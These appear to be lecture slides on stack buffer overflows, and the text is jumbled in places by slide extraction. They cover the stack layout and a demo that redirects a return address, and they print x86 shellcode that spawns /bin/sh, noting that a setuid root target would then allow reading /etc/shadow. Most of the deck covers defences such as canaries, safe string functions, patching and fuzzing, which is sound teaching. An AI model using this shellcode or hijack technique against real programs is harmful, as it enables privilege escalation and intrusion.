Week 5b
Week 5b
Buffer overflows
What is a buffer?
What is a buffer overflow?
What are buffer overflow attacks?
How can buffer overflows be exploited?
Examples of buffer overflow attacks.
How can we prevent buffer overflows?
2
In computer programming, a ‘buffer’ is a memory location where
data is stored.
A variable has room for one instance of data.
So if the variable is of type ‘int’, it will hold only one integer.
int z
char y
float x
struct Student {
aRec:
char name[8];
int sNumber;
name
};
sNumber
Student aRec;
struct Student{
char name[8];
int sNumber;
The output:
};
Student name: david
int main() Student number: 1234567
Student name: alexander
{
Student aRec, bRec;
aRec.sNumber=1234567;
strcpy(aRec.name,"david");
Student number: 1912657544
bRec.sNumber=1234568;
(or 1179762 or ...)
strcpy(bRec.name,"alexander");
// bRec.sNumber=1234568;
8
These exploit buffer overflows in the code.
Buffer overflow attacks can:
Cause an attack against availability by running a denial of service attack.
Basically meaning that resources that should be available to authentic users are not.
Run arbitrary code that either modifies data, which is an attack against
integrity, …
… or reads sensitive information, which is an attack against
confidentiality.
9
In some cases, an attacker tries to exploit programs that
are running as a privileged account, such as root or a
domain administrator.
They use those privileges to reach and attack areas they
themselves wouldn’t normally have access to.
10
1988: Morris worm: Included exploiting a buffer overflow in fingerd.
2000: Buffer overflow attack against Microsoft Outlook.
2001: Code Red worm: Exploits buffer overflow in Microsoft IIS 5.0.
2003: Slammer worm: Exploits buffer overflow in Microsoft SQL Server
2000.
2004: Sasser worm: Exploits buffer overflow in Microsoft Windows
2000/XP Local Security Authority Subsystem Service.
2005: Symantec anti-virus buffer overflow.
Why does this matter?
They design security systems!
Look at 5a_Buffer-OverFlow-MostCommon.pdf.
11
Buffer overflows are possible because of the way memory and
memory management works, or doesn’t.
In C/C++ memory management is partially the choice of the programmer.
In languages like Java and C# it isn’t.
12
Memory top
The Stack contains stack
frames associated with running Kernel code
function calls. and data
– Frames contain information like
the return address, local variables
Stack
and function arguments.
– Stack memory grows down.
Heap memory is requested by Spare Memory
programs for use in dynamic
data structures (new and new[])
Heap
– Heap memory grows up ().
Buffer overflow type attacks are Global data
also possible against global
[SB18]
data and the heap, but we won’t Fig 10.4
look at these. Program machine
code
The high to low memory addresses
differs in some implementations. () 13
Memory bottom Process control block
A CPU possesses limited registers – special memory locations for
“moving” and storing data.
The stack is where we can store variables that are local to
procedures that do not fit in registers, such as local arrays or
structures.
There is a stack pointer that points to the most recently allocated
address in the stack, that is the top of the stack, which is actually
lower in memory.
Variables declared on the stack are located next to the return address
for the function's caller. The return address is the memory location
where control should return to once a function is completed.
Look at 5a_Stack-INFO.pdf, some assembler required in places.
14
The calling function P
1. Pushes the parameters for the called function onto the
stack
2. Executes the call instruction to call the target function Q,
which pushes the return address onto the stack
The called function Q
3. Pushes the current frame pointer value (which points to the
calling routine’s stack frame) onto the stack
4. Sets the frame pointer to be the current stack pointer value,
which now identifies the new stack frame location for the
called function
5. Allocates space for local variables by moving the stack
pointer down to leave sufficient room for them
6. Runs the body of the called function
7. As it exits it first sets the stack pointer back to the value of
the frame pointer (effectively discarding the space used by
local variables)
8. Pops the old frame pointer value (restoring the link to the
calling routine’s stack frame)
9. Executes the return instruction which pops the saved
[SB18], Figure 10.3 address off the stack and returns control to the calling
function
Consider that we have this code:
16
Consider now that we have:
void function (char *str)
{ buffer
char buffer[16];
int main () {
char *str = "I am greater than
16 bytes";
function (str);
}
18
Maybe to the address of a function that we can run with the
program permissions.
Remember we talked earlier about the setuid issue in Unix.
But such code might not exist!
So, we could write it ourselves and place the code we want to
execute in the buffer's overflowing area!
We will look at an example of this at the end of this section of
notes.
We then overwrite the return address so it points back to the buffer
and executes the intended code. Such code can be inserted into the
program using environment variables or program input parameters.
19
Causing stack overflows
is often referred to as
smashing the stack.
20
We talked earlier about the types of things an attacker can do through
a buffer overflow attack.
We can explain in a little more detail now.
gets(char *str);
sprintf(char *str, char *format, …);
strcat(char *dest, char *src);
strcpy(char *dest, char *src);
vsprintf(char *str, char *fmt, va_list ap);
Functions such as strncat or strncpy are better, because they have bounds which makes it
easier to protect.
They still need to be used with care though, since they make checking easier, but they can still suffer
problems with buffer overflow if the bounds are incorrectly specified.
You also have to make sure there aren’t buffer overflows introduced due to your own code, or in
other code you have included, apart from the standard libraries.
22
/*
StackOverrun.cpp
This program shows an example of how a stack-based buffer
overrun can be used to execute arbitrary code. Its objective is
to find an input string that executes the function Y.
*/
24
F:\Examples\StackOverrun Hello
Address of X = 004012B8
Address of Y = 00401328 Hello
My stack looks like: Now the stack looks like:
7FFDF000 0022FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 6C6C6548
77C35C94 77C3006F
77C146F0 77C146E0
FFFFFFFF FFFFFFFF Hello was copied in
0023FF60 0022FF60 6C-l, 65-e, 48-H, 6F-o
00401401 The return address of X 00401401
00032593 00032593
00401328 00401328
25
F:\Examples\StackOverrun AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDF000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0023FF60 41414141
00401401 41414141
00032593 41414141
00401328 41414141
Trying to access
41414141
26
F:\Examples\StackOverrun AAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDF000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 Notice the 00
41414141
77C146F0 77004141 for the null.
FFFFFFFF FFFFFFFF
0023FF60 0023FF60
00401401 00401401
00032593 00032593
00401328 00401328
27
F:\Examples\StackOverrun AAAAAAAAAAAAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDF000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0023FF60 41414141
00401401 00401400
00032593 00032593
00401328 00401328
28
F:\Examples\StackOverrun AAAAAAAAAAAAAAAAAAAAA
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAA
My stack looks like: Now the stack looks like:
7FFDC000 0023FF30
00000018 00000018
00000001 00000001
0023FF14 0023FF14
0000000C 0000000C
0023FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0023FF60 41414141
00401401 00400041
00032593 00032593
00401328 00401328
Address of X = 004012B8
Address of Y = 00401328 AAAAAAAAAAAAAAAAAAAA(‼@
My stack looks like: Now the stack looks like:
7FFDF000 0022FF30
00000018 0000001A
00000001 00000001
0022FF14 0022FF14
0000000C 0000000C
0022FFE0 41414141
77C35C94 41414141
77C146F0 41414141
FFFFFFFF 41414141
0022FF60 41414141
00401401 00401328
003E2593 003E2593
00401328 00401328
31
Buffer overflow vulnerabilities are inherent in code, due
to poor or no error checking.
There are two sides to addressing this:
If you are the developer, you need to make sure you have secure
code.
If you are a user of software, anything that can be done to
protect against buffer overflows must be done external to the
software application, unless you have the source code and can
re-code the application correctly.
Most users wouldn’t be able to make the latter choice.
32
Dilbert: 14-Aug-2012
33
Write secure code:
Buffer overflows result when more information is placed into a buffer
than it is meant to hold.
C library functions such as strcpy(), strcat(), sprintf() and
vsprintf() operate on null terminated character arrays and perform no
bounds checking.
gets() is another function that reads user input (into a buffer) from stdin until a
terminating newline or EOF is found.
The scanf() family of functions may also result in buffer overflows.
The best way to deal with buffer overflow problems is to not allow
them to occur in the first place. Developers should learn to minimize
the use of vulnerable functions.
34
Use compiler tools:
Compilers have become more and more aggressive in optimizations
and the checks they perform.
Some compiler tools offer warnings on the use of unsafe constructs
such as gets (), strcpy () and the like.
Some compilers (such as ``StackGuard'', a modification of the
standard GNU C compiler gcc. ) actually change the compiled code
from unsafe to safe automatically; possibly by adding a canary value.
This is something you could do yourself anyway.
You can use a canary or guard value just before the return
address, and check that it hasn’t changed.
The canary value shouldn’t be predictable, or the attacker just writes it
again.
35
Figure 16 in Goodrich & Tamassia’s book
36
Perform extensive code reviews of string functionality and
indexes utilized within your application.
Use something like the <strsafe.h> library of Visual
C++.
This library has buffer overrun safe functions that will help with
the detection of buffer overflows.
Stack (and/or heap) randomisation may be available!
We will see later that this is used in some Windows OS’s.
37
Remove the vulnerable software:
This is a simple way of protecting against being attacked through
that software.
The software may well be installed by default and not-used.
For security and space/efficiency reasons it may as well be removed.
Any services or ports which are unnecessarily in operation should
be closed.
From the point of view of security it is better to know
exactly what is installed and what it is for. That is, have a
“default not install” policy.
38
Run Software at the Least Privilege Required:
This is another general rule: the principle of least privilege.
Applying this we limit the access an attacker can have, even if they
identify a way of launching a buffer overflow attack, or some other
attack.
Apply vendor patches:
Usually the announcement of a buffer overrun vulnerability will be
fairly closely followed by the vendor releasing a patch or updating
the software to a new version.
In either case, the vendor usually adds the proper error checking into
the program. By far, this is the best way to defend against a buffer
overrun.
39
Filter Specific Traffic at the Firewall:
Many companies are concerned about external attackers
breaching their companies security via the Internet and
compromising a machine using a buffer overrun attack.
An easy preventative mechanism is to block the traffic of the
vulnerable software at the firewall.
If a company does not have internal firewalls, this does not
prevent an insider from launching a buffer overrun attack
against a specific system.
40
Test Key Applications:
A good way to defend against buffer overflow attacks is to be proactive and
test software.
Since it might be time consuming, test the critical software first.
Type 200 characters for a username.
What happens?
Buffer overflow problems may be around for a long time before anyone,
with good or bad motivation, tests it against buffer overflow problems.
We expect buffer overflows to result from exceptional behaviour, not normal behaviour.
41
One way of testing for the response to exceptional
behaviour is to use fuzzing.
This uses randomly generated data, maybe within some
bounds, as input.
Inevitably most of the input is not going to be consistent with the
expected input, and it allows us to identify some problems.
Problems like buffer overflows which can occur with a wide range
of inputs are likely to be found, problems that only occur when we
have a rare combination of inputs, for example are unlikely to be
detected.
42
We could use something like “strings” from
Lecture of Week 2 as a simple check of
whether unsafe functions are being used.
43
… obviously every programmer working on major projects now knows
about buffer overflow problems and avoids them.
Yeah, right!
Actually avoiding them isn’t as easy as it looks.
https://www.kb.cert.org/vuls/html/search
Across many different operating systems and deployment environments.
Even experts make mistakes sometimes.
When cryptographic algorithms are published and released for testing a
reference implementation is often made available too.
The reference implementation for MD6, a hash function, was found, in December
2008, to contain a buffer overflow.
44
Remember I said earlier about inserting your own code into the
buffer.
This is called shellcoding.
45
int main(int argc, char*argv[])
{
char *sh; 5a_Shell.cpp
char *args[2];
This will
sh = “/bin/sh” open a shell.
args[0] = sh;
args[1] = NULL;
execve (sh, args, NULL);
}
46
Remember the setuid issue! (?)
If the program which this buffer overload attack is
launched against is owned by root and is a setuid
program, then the shell will run with root permissions.
This means that when we attack we also include
instructions to, for example, view /etc/shadow,
and we will be able to.
So the input for the buffer overflowing is submitted and
instructions to run in the shell.
47
nop
nop // end of nop sled
5a_x86code.txt
jmp find // jump to end of code
cont: pop %esi // pop address of sh off stack into %esi
xor %eax, %eax // zero contents of EAX
mov %al, 0x7(%esi) // copy zero byte to end of string sh (%esi)
lea (%esi), %ebx // load address of sh (%esi) into %ebx
mov %ebx,0x8(%esi) // save address of sh in args[0] (%esi+8)
mov %eax,0xc(%esi) // copy zero to args[1] (esi+c)
mov $0xb,%al // copy execve syscall number (11) to %al
mov %esi,%ebx // copy address of sh (%esi) into %ebx
lea 0x8(%esi),%ecx // copy address of args (%esi+8) to %ecx
lea 0xc(%esi),%edx // copy address of args[1] (%esi+c) to %edx
int $0x80 // software interrupt to execute syscall
find: call cont // call cont which saves next address on stack
sh: .string "/bin/sh " // string constant
args: .long 0 // space used for args array
.long 0 // args[1] and also NULL for env array
49
Fig 10.11(a) in [SB18] 50
The address is
0x080497b8